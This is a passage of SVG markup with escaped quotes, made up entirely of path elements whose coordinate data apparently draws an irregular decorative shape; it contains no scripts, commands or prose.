d=\"M887.1,73.8c-.1-.2-.2-.3-.2-.5-2.5-.5-2.2-.2-5.2-.7-.3-.3.8-.4-2.3-.8a11.18,11.18,0,0,0,3.5,1.2C883.7,72.8,885.7,73.6,887.1,73.8Z\"></path>\n <path d=\"M1027,96.2c.8.1,1.5.3,2.3.4,2.9-.2,1.2-.7,3.5-.7C1029.4,95.4,1028.3,96.2,1027,96.2Z\"></path>\n <path d=\"M1047.2,95.7c-1.7-.1-6.4-.5-3.8.1C1042.6,95.2,1049,96.6,1047.2,95.7Z\"></path>\n <path d=\"M924.7,75.5c4.7.9,2-.1,6.1.7,2.2.7-.8.4,1.4.9-1-.6,7,.8,5,.3a39,39,0,0,1-6.5-1.4c1.9.1,1.7-.2.7-.5-1.8-.1-1,.7-5-.3C927.2,75.6,923.4,74.9,924.7,75.5Z\"></path>\n <path d=\"M746.9,45.1a23.56,23.56,0,0,1,4.1.5,12.3,12.3,0,0,0-3.4-1.1C750.8,45.2,743.9,44.7,746.9,45.1Z\"></path>\n <path d=\"M1022.3,87.9l.3.6a18.2,18.2,0,0,0,3.1.5C1023.4,88.6,1025.6,88.4,1022.3,87.9Z\"></path>\n <path d=\"M810.2,50a13,13,0,0,1-3.1-.4c1.2.7-1.6-.1-1.9,0,1.11.21,2.21.48,3.3.8-2.6-.5-2.5.1-.7.7-.8-.4.2-.4,3,.2.4.6,1.1.6.4,1,4.3.7,2,1,5.6,1.6-4.1-1.2.1-1.4-8.2-3.2C807.4,50,813.6,50.9,810.2,50Z\"></path>\n <path d=\"M1046.7,90.4c3.2.4,1.4-.5,3.7-.4,5.9,1.4,7.3,2.7.9,1.9-1-.5,1.3-.1.8-.4-3.7-.5-4.4.6.7,1.4-.5-.9,4.8-.2,7.7-.2-1.2-.2-3-.5-3.2-.6,5.3,1,.3-.3,3.9.1-1.5,0,3.7.9,3.2.6-2.5-.4-2.5-.8-4.4-1.2.9.4-2.1-.1-3-.2.2-.2-1.5-.5-2.3-.7,4,.4,5.5.8,7.1.6-3.4-.6-3.1-.3-5.3-.9,1.4.7-3.5-.3-3.9-.1-.1-.1-.1-.2-.2-.4-1.4-.2-2.8-.5-4.2-.7C1049.9,90.2,1045,89.9,1046.7,90.4Z\"></path>\n <path d=\"M1055.8,93.2a47.23,47.23,0,0,0,4.9.2C1056.2,92.5,1054.6,92.9,1055.8,93.2Z\"></path>\n <path d=\"M1202.1,116.5c2.6.5,2.2.2,5.2.8C1207,116.2,1206,116.7,1202.1,116.5Z\"></path>\n <path d=\"M948.2,74c4.8.6,3.5-.2,2.1-.9-.7-.4-1.5-.7-1-.8-3-.3-1.4.3-.2.8.9.4,1.6.8-.1.7-3.6-.6,2.6,0-2.3-.7C947.5,73.4,945.9,73.6,948.2,74Z\"></path>\n <path d=\"M901,66.1c1.4.2,2.8.5,4.2.7C906.2,65.9,904.9,66.5,901,66.1Z\"></path>\n <path d=\"M961.1,74.7c-1.3-.2-5.6.3-1.5.9C957.4,75,961.7,75.2,961.1,74.7Z\"></path>\n <path d=\"M986.7,77.8c.3.5-6.9,1.1.9,1.9C988.9,79.3,989.9,79.1,986.7,77.8Z\"></path>\n <path d=\"M817.5,49c-5.5-.9-6-2.7-2.1-2.5.8.6.4.8,1.5,1.3-.1-.2,2.9.4,3,.3-.3-.2-.8-.9-3.5-1.2,3,.3.6-.5,1.7-.5-3.1-.4-5.6-1.3-3.4-1a2.57,2.57,0,0,0,1.1.4c6.4-.1-3.8-3.2,4.5-2.8-1.5-.5-5.1-.7-5.3-1,5.7.4-2.3-2,4.1-1.7-1.08-.15-2.14-.35-3.2-.6,2.8.3,1.6-.9-.6-1.2.9-.3,3.6-.2,8.1.8-4.4-1.2,1.7-.3-.5-1-1.6.3-3-.9-6.5-1.4-.5.5-1.3.6,1.6,1.4-7.5-.1-1.9,2.5-4.3,3.3a32.89,32.89,0,0,1-5.2-.9c2.9.9,4.4,1.8,1.8,1.7,2.9.5,3.2.8,3.4,1.1-1.3-.2-1.5-.4-3.2-.6,0,.2.6.3,1.2.5-1.1-.2-1.3-.3-2.2-.5,1.6.6-2.6.1.3.7a6.05,6.05,0,0,1,1.9,0c-.1.2,1.3.5,1.3.7-4-.8-1.8,0-5.1-.6,3.1.9,3.4,1.1,1.6,1.4a24.16,24.16,0,0,1,4.3.9c-5-1.1-3.9.1-1.6.7-1.4-.2-2.3-.4-3.2-.6,1.2.9.9,1.6-2.1,1.6,4.7.7,3.3,1.3,2.6,1.4-1.3-.3-2.4-.5-3.3-.8,3,.7,2.7,0,.8-.3.9.8-3.3-.1-5-.3a72,72,0,0,0,10.6,2c-.4-.4-2.6-1.7,1.5-.9-3-.4,1.7.5,1.2.5-.6.4.4.5-.6.8a14,14,0,0,1,3.2.8c0-.2,3.4.5,3,.2C815.3,50.2,822.3,50.4,817.5,49Z\"></path>\n <path d=\"M983.5,77.3c-.2-.4-3.9-1.1-5.6-1.6C975,74.8,979.8,76.8,983.5,77.3Z\"></path>\n <path d=\"M888.4,59.9c2.4.2,1.7-.3-1.4-1,.6.9,1.9,1.6,0,2,1.4.2,4.1,1.1,4.3.8-3.7-1-.3-1,2.4-1C891.1,60.2,891.4,60.5,888.4,59.9Z\"></path>\n <path d=\"M1043,84.4c-1.7.2,2.5,1,.6,1.2,6,1,.4-1-1.7-1.6-.4.1-5.1,0-2.8.2C1040.8,84.4,1040.5,84.1,1043,84.4Z\"></path>\n <path d=\"M789.8,41.4c-6.2-1.1,1.8-.1-3.4-1.1.4.3-1.3,0-1.9,0,5.8,1.2-1.2.9,2.8,1.9C786.8,41.6,787.1,41.2,789.8,41.4Z\"></path>\n <path d=\"M792,42c.1.4-3.6-.8-3.1-.4,1,.3.4.4,1.4.9,1.4.2,2.8.5,4.2.7C794.1,42.8,795,42.5,792,42Z\"></path>\n <path d=\"M896.8,59.3c-.4-.3,5.4.5,1.8-.4.5.3-3-.4-3-.2,2.3.5-1.4.3,2.4,1.1.4-.2,1.7.5,3.2.6C902.2,60.2,897.6,59.7,896.8,59.3Z\"></path>\n <path d=\"M1015.1,78.7c3.3.6,1.9,0,5.1.6,0-.1-.1-.2-.2-.4C1017.3,78.6,1017.2,78.9,1015.1,78.7Z\"></path>\n <path d=\"M905.3,56.6c-5.8-.8-5.7-.6-10.3-1.4-.1.5,2.2,1-.6.8,7.5,1.4.4,1.3,2.8,1.9,2.6.2,0-.9,4.8-.1,2.6.6-1.7,0,1.3.7-.2-.6,1.4-1-1.9-2,3,.6,2.6.3,5.2.8C906.7,57.1,905.2,56.8,905.3,56.6Z\"></path>\n <path d=\"M1143,95.6c-.8-1.1-4.4-2.8-.3-2.8-3.8-.5-1.7,0-4.3-.8,1.7,1-8.7.1-3.1,1.7a19.06,19.06,0,0,0-3.1-.4c4.5.7.7.5-.8.3,2,.9-.5,1.3-1,1.9,2.5.3,5.2,1.1,5.3.9-1.5-.3-1.3-.5-2.3-.7,6.5,1.1,4.9.5,9.3,1.2-4.8-.9,1.4-1-3.7-1.7C1139,95,1142.5,95.7,1143,95.6Z\"></path>\n <path d=\"M792.2,36.3c-2.7,0-.7,1.1,1.9,2-1-.6,1-.4.6-.8C790.2,36.8,796.2,37,792.2,36.3Z\"></path>\n <path d=\"M902.9,53.5c2.6.5,3.4.8,4.1.6-2.8-.4.7-.5-3.4-1-.9.1,3.3.9.2.5-3.9-1.1-2.7-1.8-1.9-2-6.7-1.4-3.7.6-3.3,1.1l-2.1-.3c.7-.2-1.8-.6-2.4-1,.3-.2,2.1.1,1.8-.3-3.5-.6-1.5.2-2.8.2,1.1.4,3.4.9,3.5,1.2-4.4-.5-.7.6-3.6.5q3.45.6,3.3.9a19.07,19.07,0,0,0-2-.2c0-.2-.9-.4-2.3-.7,1,.6-.2.7-2.7.4,3.6.4.8.5,3.3.9,2.3.2-1.5-1.1,3.9,0-.3.1-1.4,0-.8.3,4.5.8,5.3.8,8.5,1.6.9-.3-3.7-1-3.5-1.4,3.7.7,5.5,1.3,6.2.9-4.2-.7-6.3-1.3-6.6-1.8C905.2,55.2,901.7,53.6,902.9,53.5Z\"></path>\n <path d=\"M753.8,28.6c3.9.5,2.2.7,5.4,1.1,1.5.1-.7-.9-2.3-.7-.3-.3,4.9.1-.4-.8,1.5.8-1.8.6-4-.2-2.9-.3,2.1,1.4-2.6.6,3.2.8,2.3.9,3.6,1.5C756.8,30.2,750.3,28.4,753.8,28.6Z\"></path>\n <path d=\"M866.5,46c-1.6,0-6.8-1.1-5.1-.6,5.5,1,2.2,1.3,5.6,1.7C866.2,46.8,865.9,46.4,866.5,46Z\"></path>\n <path d=\"M752.4,25.5c-4.1-.5-10.9-1.9-13.6-2.1,5.3,1,5.7,1.6,9.9,2.5C746.1,24.9,749.4,25.3,752.4,25.5Z\"></path>\n <path d=\"M894.3,47.7c-2.1.2,1.6,1.5-1.4,1.2,7,1.2,3.5,1,5.7,1.8,2,.4,2.3.3,4.1.6-.1-.2-.2-.5-.3-.7-4.2-.8-1.7-1.1-1.5-1.1a42.22,42.22,0,0,0,4.3.8c.3-.2-2-.6-1.3-.8-3.5-.7-.6.3-4.1-.5.7-.2-1.6-.6-1.3-.8,5.9.6,5.2-.4,3.3-1.2C894.9,46.2,899.5,49.3,894.3,47.7Z\"></path>\n <path d=\"M902.5,29.9c-5.4-.8,0,1.3-4.5.8.2-.3-6.3-1.5-5.2-.9,7.9,1,7.5,3,7.5,3.6,2.6.4-.6.8,2.7,1.6-.9,0-3.8-.6-3-.2,3.5.5,3.4,1.3,5.8,2.1-1.3-.2-1.4-.1-3.1-.4.1-.3-.2-.6-3.4-1.1,2.6.8,1,1.3,0,1.7a14.29,14.29,0,0,0-4.5-1.2c3,.6-.1.5.3.7,1.3.2,2.6.4,3.8.6-.5.3-.5.6.8,1-3.3-.6-2.1-.4-5.3-.9.1.3,2,.7,1.4.9-3.9-.7-4.5-.6-3.9-.1,2.5.2,2,.1,6.1.6.5.3,1.7.8.3.7-4.8-1.3-.5.2-5.2-.9a23,23,0,0,1-4.5.8c4,.7.4-.5,5,.4.1.2.2.5.3.7a21,21,0,0,0-4.1-.5c10,1.6,1.9,2.3,9.7,4.2-1.6-.3-2.7-.6-4.3-.9.4.3-1.3,0-1.9,0,1.5.5,3.1.3,4.3.8.4.5-.4.2-2-.2-.6.4,5.1,1.1,4.5,1.4-6.7-1.2.8.7-3.8,0,4.4,1,0,.5.5,1.1,4.5.9-.1-.6,2.9-.1.1.2,1.9.4,2.2.6a62.51,62.51,0,0,0,7.1.7c-6.9-1.1.8-.2-2.4-1.1,1.6.4,2.6.6,3.1.4-2.4-.4-1.3-.5-3.3-.9-.3.2-.1.5-2.9,0-2.2-1.5,2.1-1.5,5.8-2.2,4.1.9-1.5.6.5,1a17,17,0,0,1,3.1.5h0v-.1a.33.33,0,0,1,0-.47h0a.18.18,0,0,0,0-.27h0a6.37,6.37,0,0,0-1.7-.6c-.1.1-.2.2-2-.1-1.4-.6.5-.4-1.4-.9-8.6-1-4.5-2-2.9-2,.9-.3-2.8-.8-2.4-1.1,4,.6,5.5.5,3.8-.1-5.1-1-1.1.5-4.9-.1-.9-.6,3.8,0,.5-.9a29.59,29.59,0,0,0,5.2.8c-3-1.4-.3-1.4-3.2-2.6,2.1.3,1.5.6,4.3.9-2.1-1.9.1-3.1-3.4-5.2,3.8.7.7-.6,4,.1-4.3-1.2,1.9-.8-3-2.2,0,.1-1.3-.1-1.1-.3,2.8.4,2.2.6,4.3.9-.7-.3.9-.5-1.4-.9-.1.1-.2.2-2-.1-.1-.8,2-1,4.3-1.2,1.5.6,1,.6-.7.6,1.9.3,2.3.3,4,.6h.2a.3.3,0,0,1-.2-.1c-3.1-1.5-8.9-2.8-8.5-3.9-4.2-.8-2.4-.1-5.1-.5.2.4,2.9.9,3.5,1.2-4.6,0,.1,2.2.4,3a28.56,28.56,0,0,0-4.3-.9C899,29.1,901.3,29.5,902.5,29.9Z\"></path>\n <path d=\"M907.2,42c.5-.1-1.5-.8.8-.4,1.1.2,2.6.4,1,.1-1.4-.2-2.8-.5-4.2-.7C906.5,41.4,903.8,41.3,907.2,42Z\"></path>\n <path d=\"M909.1,48.3c-.8.2-2.1-.5-3.2-.6a5.88,5.88,0,0,1-2-.2c-.1.5,4.1.8,4.4,1.1-3.1-.4-2.9.1-3.7.4C907.7,49.2,909.7,48.6,909.1,48.3Z\"></path>\n <path d=\"M738.1,23.9c-1.8-.7.8-.5-2.5-1.2C732.6,22.5,739.1,24.3,738.1,23.9Z\"></path>\n <path d=\"M846.8,41.2c-.8.2,4.8,1.7,4.4,1.2C846.9,41.9,851.1,41.8,846.8,41.2Z\"></path>\n <path d=\"M839.8,40.7c3.3.6,1.9,0,5.1.6-.6-.3.9-.4-1.3-.8C845.2,41.4,840,40.4,839.8,40.7Z\"></path>\n <path d=\"M772.5,29.2c-1.9.3,10.2,2,5.3.9C777.6,30.6,774.4,29.5,772.5,29.2Z\"></path>\n <path d=\"M757.7,26.5c-.3-.2.2-.4-1.3-.7-.7,0-2.7.4-.8.4.1-.4,4.1,1,4.1.6Z\"></path>\n <path d=\"M763.2,25.9a1.82,1.82,0,0,0-1.1-.2c4.2.8-.1.3.3.7,3.4.4,3.1-.2,8.1.7-2.1-.3-1.5-.6-4.3-.9C766.5,26.4,765.3,26.3,763.2,25.9Z\"></path>\n <path d=\"M774.2,24.6c-1,.2,2.2.5,2.5.7.2,0,.5-.1.7-.1C776,25,775.1,24.8,774.2,24.6Z\"></path>\n <path d=\"M776.7,25.3a.37.37,0,0,0-.3.1h.2C776.7,25.4,776.7,25.4,776.7,25.3Z\"></path>\n <path d=\"M768.8,23.4c-2.8.1-1.2.2-.4,1.2,5.6,1.1,3.4,1,8.8,2.4-2.4-1-2.2-1.3-.9-1.5-2-.4-2.1-.6-4.2-1-.7.3,3.4,1.2-.7.7C768.1,24.1,773.5,24.3,768.8,23.4Z\"></path>\n <path d=\"M752.7,22.1c-4.3-1.2-3.1-1.9-8.1-2.8C747.3,20.3,748.1,21.1,752.7,22.1Z\"></path>\n <path d=\"M847.2,35.8c2.5.5,1.3.7,3.4,1.1.7-.4-2.4-1.2,1.5-1C849,35.5,849.5,36.1,847.2,35.8Z\"></path>\n <path d=\"M744.4,18.9c1.4.2,2.3.4,3.2.6.3-.4-.8-.8-3.5-1.4C745.7,18.7,747.1,19,744.4,18.9Z\"></path>\n <path d=\"M736.1,17.6a10.11,10.11,0,0,1,3,.3c1,0,.8-.3,1.8-.3a17.84,17.84,0,0,1-3.3-.8c-1.9-.1.6.4,1.3.8C738.3,17.6,732.9,16.9,736.1,17.6Z\"></path>\n <path d=\"M874.1,39.7c.6-.5-1.7-1.3.4-1.3-2-.1-9.5-1.1-5.8,0C871.1,38.4,872.5,39.3,874.1,39.7Z\"></path>\n <path d=\"M819.1,29.6c-1-.2-2.1-.3-3.1-.5,1.1.4.6.7,2.4,1.1-.3-.3,1.1-.1.8-.3a10.32,10.32,0,0,1-2.2-.5A12.34,12.34,0,0,0,819.1,29.6Z\"></path>\n <path d=\"M745.7,17.5c-.4.2,2.1,1.1,3.4,1-1.9-.3-2.5-.6-2.3-.8,1.4.2,2.3.4,3.2.6C749.7,17.8,747.5,17.7,745.7,17.5Z\"></path>\n <path d=\"M1115.1,77.7a10.78,10.78,0,0,0-1.8-.2c.2,0,.5.1.7.1,3,.6,7.3,1.9,1.6.7.1.4,5,1.1,6.5,1.5-.3-.4-2.6-.9-3.5-1.4C1118.1,78.7,1116.6,78.1,1115.1,77.7Z\"></path>\n <path d=\"M759.6,18.2c1.6.2,3.9.7,4.1.6-1.9-.3-2.5-.6-2.3-.8-6.8-1.3-6.8-1.5-12.8-2.6-1.4-.2.1.4-1.9.1-1.7-.4,1.5-.5-3.5-1.4,3.4,1.5.5,1.8,3.2,2.8,0-.2,4,.7,5.3,1-.3-.6,4.8,0,.4-1.2,3.8.6,7.8.9,9.5,1.7C760.8,18.3,759.6,18,759.6,18.2Z\"></path>\n <path d=\"M909.6,43c.9.1,2,.3,3.1.4,2.4.3,4.3.5.8-.2a1.67,1.67,0,0,1-.8.1c-.7-.1-1.3-.4-.3-.4a19.06,19.06,0,0,0-3.1-.4,10.32,10.32,0,0,1,2.2.5C910.2,42.8,909.4,42.8,909.6,43Z\"></path>\n <path d=\"M849.5,32.8c-.4-.5,4.6.3,5,0-1.6-.5-2.5-.3-3.2-.6-1.1-.7,3.4-.1,1.5-.9a7.46,7.46,0,0,1-2.1-.3C851.5,31.8,848.9,32.2,849.5,32.8Z\"></path>\n <path d=\"M763.1,17.3c-1.2-.2-1.2-.4-1.2-.5-4.4-.6-3.1-1-6.5-1.5C755.9,15.7,761.8,17.1,763.1,17.3Z\"></path>\n <path d=\"M737.2,11.7c-1.9-.1-.3.7,1.5,1.1C735.7,11.8,741.3,12.5,737.2,11.7Z\"></path>\n <path d=\"M740.4,12.3c.6.1,1.2.2,1.1.3,3.5.7.6-.3,4.1.5,1.4.4.5.7,2.5,1.2-1.4-.6,1.5,0,1.9-.1-2.3-.4-.7-.5-1.3-.8a64.57,64.57,0,0,0,7.3,1.2c-2.4-.8.3-1-1.6-1.3-1.7-.1,0,.8-4.9-.1.8,0,1.2-.1.8-.4-3.6-.5-8.2-.8-5.8,0-2.9-.5-2.2-.6-4.2-.7A.3.3,0,0,1,740.4,12.3Z\"></path>\n <path d=\"M757.6,13.9c-2.3-.1,1.2.9,2.6,1.4C761.8,15.4,758.3,14.4,757.6,13.9Z\"></path>\n <path d=\"M876.6,33.6c-.5-.1-1.2-.3-1.6-.4a8.65,8.65,0,0,0,1.6.2c2.7.4,4.9.4,3.4-.1-1.1-.1-2.2-.1-3.3-.2-1.4-.1-2.9-.2-4.7-.4,1.2.3,3.2.6,4.6.9.2.2.5.2.7.3S877,33.8,876.6,33.6Z\"></path>\n <path d=\"M747.1,12.1c4.4.7,2.2-.1.7-.5-2.5-.3-4.5-1.1-5.3-.9C746.2,11.3,748.6,12,747.1,12.1Z\"></path>\n <path d=\"M895.6,29.6c.7-.7,0-1-2.9-2,.9.6,1.1.6-.7.7C899,29.4,890.9,28.7,895.6,29.6Z\"></path>\n <path d=\"M865.9,23.9c-1.3-.8,3.2-1.1-3.1-2.5C866.6,22.6,861.7,22.6,865.9,23.9Z\"></path>\n <path d=\"M880.3,21.7c0,.3,1.8.6,2.4,1-3.9-.6,1,.7-3-.3,2.9.8-1.5.5,1.6,1.3,0-.1.1-.1,1,.1.6.1,1.2.2,1,.1-1.2-.2-1.2-.4-1.2-.5,3.6.8,3.9.7,4.1.5,2.3.5,6.3,1,5.5,1.4,4.2.5,5.2.1,7.8.2-4.9-.8-4.2-.1-9.1-.8.8-.3-5.9-1-5.5-1.4-.2-.6,4.5.7,4,.2-.3-.4-3.3-.3-3.2-.6,3.4.4-2.3-.7-1.3-.8.6.1,3.9.4,4.2.7s-1.3,0-1.9,0c1.8.3,3.3.6,4.2.8-.4-.5.6-1.1-5-2.4-2.4-.1,1.7.5,1.3.8-4.2-.4-5.9-.8-3.3-.9-4.3-.7-3.4,0-.7.7a10.11,10.11,0,0,0-3-.3c1.2.2,3,.5,3.2.6s-.7.2-1.9,0c-1.3-.4-2.8-.8-4.4-1.2l-1.1-.3c-.9-.1-.1.3,1.1.6C878.1,21.3,879.6,21.7,880.3,21.7Z\"></path>\n <path d=\"M876.4,21.6c-3.5-.5-6.6-.9-7.1-.6C871.9,21.2,875.2,21.7,876.4,21.6Z\"></path>\n <path d=\"M886,15.3c-.7-.5-4.2-1.5.5-1-5.9-.9-4.2-1.4-6.8-2.1-5.6-.6,6.1,2.1-.3,1.4-.2-.2-.5-.3-2.2-.6h0c-.9.4,2.4,2-5.4.9,3.8,1,3.7,1.2-.7.7,2.4.4,4.4.6,6,.8a21.86,21.86,0,0,0,4.2.2c.2.2,3.5.7,3.3.9a25.55,25.55,0,0,0-2.9.1c1.8.3,3.3.6,4.3.8.7-.2-1.6-.6-1.3-.8,1.5.3,1.9.5,3.3.8.5-.3-2.5-.8-2.5-1.2a39.07,39.07,0,0,1,4.3.9c-1.9.3,7.6,2.4,4,2.3,4.3.5,1.1-.5,2.6-.6-.7-.3-5-.8-5.4-1.1-.1-.1-.1-.2-.2-.4a35.54,35.54,0,0,1,7.5,1.6c2.3.1-3.2-1-3.5-1.4,1.1,0,.6-.4,4,.2,2.1.5,5,1.1,6.6,1.6-2.4-.4-4-.7-5.3-1-.4.6,3.5.7,4.5,1.3.2.5-1.3.4-2.7.4,1.2.2,3,.5,3.2.6-5.1.3-1.7,2.6-7.4,2.9-1.2-.2-1.2-.4-1.2-.5a37.31,37.31,0,0,0-4.1-.5c2.8.7,7.2,1.6,10.8,2.3.5.6-3.5-.6-4-.2,2.6.7,5.1.8,8.4,1.4-3.3-1,.3-.8-3.7-1.7-1.1-.1-.1.4-3-.2a37.58,37.58,0,0,1,6,.3c-1.3-.6-1.5-1.2-.6-1.2,2,.1,2.1.4,4.3.8.6-.4-5.1-1.1-4.5-1.4,2,.3,3.5.5,4.1.5-7.2-1.1,4.7,0-1.6-1.3-1.4-.1-.2.5-2.9.1-.7-.8,2.7-.4,4.6-.5-1.2-.2-3-.5-3.2-.6,4.4.3-.8-1.2,2.1-1.6-4.9-.8-2.2-.7-2.4-1.1-3.3-.6-3-.3-6.2-.9,1.9.8-.5.1-4-.2-1.6-1-6.6-2.2-10.2-3.3C886.2,14.4,889.8,15.6,886,15.3Z\"></path>\n <path d=\"M911.8,26.9c.9.1-.1-.3,1.4-.1.5.1,1.3.2,2.6.4,0,.2.5.5,1.2.4,0-.2-.6-.3-1.2-.5-1.1-.2-1.9-.3-2.6-.4a25.93,25.93,0,0,1-3.7-.6C909.8,26.3,908.7,26.5,911.8,26.9Z\"></path>\n <path d=\"M869,18.1c3.1.5,7.9,1,6.1.6-1.9-.2-2.7-.2-5.1-.5-.2-.2,0-.4-2.3-.7C867.6,17.7,869,17.9,869,18.1Z\"></path>\n <path d=\"M889.3,20.3a19.07,19.07,0,0,0,2,.2,2.71,2.71,0,0,0,1.2.4c0-.5,1.8-.6-3.7-1.6C890.9,20,889.2,20.2,889.3,20.3Z\"></path>\n <path d=\"M876,16.6c-3.7-.6-3.1-.1-5-.3a18.2,18.2,0,0,0,3.1.5C871.2,16.2,877.4,17.2,876,16.6Z\"></path>\n <path d=\"M913.4,17.7c1.3.3.8.4,0,.3a12.05,12.05,0,0,0-1.9,0,7.14,7.14,0,0,0,1.9.2,10.53,10.53,0,0,1,3.3.5,10.36,10.36,0,0,0-2-.2c6.7.9,1.3-.3,2.6-.6a24.13,24.13,0,0,0-3.8-.4,4.87,4.87,0,0,1-1.2-.1C912.7,17.5,913.1,17.6,913.4,17.7Z\"></path>\n <path d=\"M870.1,10.2c3.7.9-.8.5,4.5,1.4-.4-.3-2.3-.8-.3-.7C872,10.7,870.2,9.9,870.1,10.2Z\"></path>\n <path d=\"M874.2,10.7c1.2.2,2.1.5,3,.7,1.2.3,2.5.6,4.5,1-.1-.2-.1-.3-.2-.5-1.1-.2-3.1-.5-4.3-.7-.6-.1-1-.2-1-.3a1.56,1.56,0,0,0,1-.1.18.18,0,0,0,0-.27h0a2.37,2.37,0,0,0-1.4-.5C873.5,9.9,877.5,11.1,874.2,10.7Z\"></path>\n <path d=\"M879.6,9.8a7.46,7.46,0,0,0-2.1-.3c1.2.3,7.4,1.8,6.5,1.4-3-.6-.4-.6.8-.4a15.73,15.73,0,0,1-3.3-.8C879.6,9.5,883.1,10.3,879.6,9.8Z\"></path>\n <path d=\"M910.2,11a12.17,12.17,0,0,1,3.4.4,41,41,0,0,0,4.9.9c-.2-.3-2.7-.8-4.9-1.1S909.6,10.6,910.2,11Z\"></path>\n <path d=\"M928.2,103.9c-3.3-.6-1.9,0-5.1-.6-1-.6,1.3-.2.7-.7-.5-.2-4.4-1.2-5.3-1,3.5.8.2.7.5,1.1a17.84,17.84,0,0,1,3.3.8C922.3,103,929.9,104.9,928.2,103.9Z\"></path>\n <path d=\"M761.4,34.5c3,.4,3.2.4,6.3,1l-.3-.6c-2.8-.7-3.6-.5-5.3-1,.2-.2,1.7,0,4.1.5a12.72,12.72,0,0,0-4.7-1.7C762.7,33.6,758.4,33.2,761.4,34.5Z\"></path>\n <path d=\"M824.9,41.9c0-.1.8,0,1.1.2a2.71,2.71,0,0,0,1.2.4c-.1-.7,3.2.1,4.7-.2-4.6-.9-5.8-.8-8.3-1.2C824.2,41.4,822.6,41.5,824.9,41.9Z\"></path>\n <path d=\"M818.7,34.9c-4.2-.4-.4.7,1.5,1.3a7.45,7.45,0,0,1-2-.1c-1.7-.4,0-.5-3.4-1,1.5,1,.4,1-.3,1.4,4.3.2,6,1.2,9.4,1.6-3.5-.8,6.1.5,1.7-.5-1.7-.1-4.3-1.2-2.5-1.2-1.5-.5-3.8-.5-4.3-.8-1.6-.7,1.9-.2,4,.3a49.92,49.92,0,0,0-8.7-2.1C813.7,34,818.2,34.5,818.7,34.9Z\"></path>\n <path d=\"M793.3,30.3c-8.2-1.2-3.4.8-4.1,1.5a7.13,7.13,0,0,1,3,.5c-3.3-.1,2.2,1.6,2,2.1.9-.4,2.2-1.1-1-2,2.7.3,1.8-.1.7-.6,1.8.3,3.3.6,4.3.8a36.07,36.07,0,0,0-8-2.5C791.9,30.3,793.9,30.7,793.3,30.3Z\"></path>\n <path d=\"M1701.8,92.1c1.7-.2,3.8-.5,1.8-1h-1.7c-3.4.2.2,1.2-7.4.6,2.7.7,4.2.9,1.4,1.6,5.8.2,4.8-.3,6-.5.1,0,.2-.1.4-.1h-.4C1699.1,92.5,1700.2,92.3,1701.8,92.1Z\"></path>\n <path d=\"M1676,91.4c-3.6-.4,0-.6-6.3-.8C1670.3,90.9,1671.3,91.2,1676,91.4Z\"></path>\n <path d=\"M1697.2,91.7c1-.3,4.5-.5-.8-.9C1697.5,91.1,1692.8,91.4,1697.2,91.7Z\"></path>\n <path d=\"M1669.2,85.2a66.58,66.58,0,0,1,7.2.3c-1.9-.4,2-.2,2.4-.4C1675.3,84.8,1673.1,85.2,1669.2,85.2Z\"></path>\n <path d=\"M1676.8,84.4c-.5.3-2.4-.2-4.4-.2a25.42,25.42,0,0,1-3.9.3c3.5.1,6.8.1,8.6.3C1675.7,84.6,1681.1,84.6,1676.8,84.4Z\"></path>\n <path d=\"M1649.6,83.4c-2.5,0-4.4-.1-5.8-.2.4.3,1.3.5,3.4.7C1645.7,83.6,1649.2,83.6,1649.6,83.4Z\"></path>\n <path d=\"M1653.4,81.5c-3,0-3-.8-4.6-.5,3.4.6-11.6,0-5.1.5C1646,81.2,1649.8,81.7,1653.4,81.5Z\"></path>\n <path d=\"M1663,81.3c-2.6.1-6.4,0-6.7.3C1661,81.8,1663,81.7,1663,81.3Z\"></path>\n <path d=\"M1656.4,80.1a37.64,37.64,0,0,1-4.5-.3c1.4.5-1.4,1.2,4,1.4C1656.5,80.7,1654.9,80.5,1656.4,80.1Z\"></path>\n <path d=\"M1697.3,80.8c-.4.3-7.1.6.8.9C1695.7,81.3,1701.4,81.1,1697.3,80.8Z\"></path>\n <path d=\"M1689.9,77.1c.2-1.1,1.6-1.1,3.6-2.2-7.2-.1-7.7,0-2.4.5-2.7-.1-3,.1-5.6,0C1690.9,76,1683.8,76.9,1689.9,77.1Z\"></path>\n <path d=\"M1695.3,73.8c-5.3,0-4.4.6-6.1,1C1695.7,74.8,1694.2,74.2,1695.3,73.8Z\"></path>\n <path d=\"M1424,67c-5.6-.2-1.5,1.4-.4,1.1C1423.5,67.5,1423.1,67.5,1424,67Z\"></path>\n <path d=\"M1644.3,71.1c-.3-.1-.6-.3-3-.3-.6.5,10,.7,10,.3C1647.2,71,1647.7,71.2,1644.3,71.1Z\"></path>\n <path d=\"M1448.2,66.1c0-.4,1.8-.7,1.8-1.2C1446.3,65,1444.3,66.1,1448.2,66.1Z\"></path>\n <path d=\"M1696.8,70.8c.2-.4,2.6-1-1.3-1.4C1695.3,69.9,1691.7,70.2,1696.8,70.8Z\"></path>\n <path d=\"M1473.3,64.6c2.5,0,3.4.2,3.1.4,1.4,0,2.8.1,4.3.1C1481.5,64.8,1475.4,64.4,1473.3,64.6Z\"></path>\n <path d=\"M1460.1,63.8c.9,0,1.6,0,1.3-.1-5.2-.3,3.9-.1.9-.5-3.4.1-6.2-.5-7.1-.2,2.2.2,4.2.6,2,.7C1458.2,63.7,1459.1,63.8,1460.1,63.8Z\"></path>\n <path d=\"M1642.1,67c-.6.5,7.3.4,10,.3C1648.7,67,1645.1,67.3,1642.1,67Z\"></path>\n <path d=\"M1649.2,64c-7.8.1-8,.9-5.7,1.4,4.5-.1,4.3-.6,7.6-.8-4.8-.5-2.8.3-5.3.3-.1-.1-1.3-.2-1.6-.3C1645.6,64.4,1649.5,64.4,1649.2,64Z\"></path>\n <path d=\"M1656.6,64.6c0,.1-.1.1-1.3.1-.1-.2-1.3-.3-3.1-.4,1,.2-1.1.7,2.1.8l-.3-.3C1657,65,1660.6,64.8,1656.6,64.6Z\"></path>\n <path d=\"M1647.3,63.5c.9-.1,0-.8-2.3-1a26.77,26.77,0,0,1-4.2,0C1639.7,63.1,1645,63.2,1647.3,63.5Z\"></path>\n <path d=\"M1499.7,58.4c4.8.2,7.4-.4,2.2-.6C1500.1,57.8,1501.6,58.3,1499.7,58.4Z\"></path>\n <path 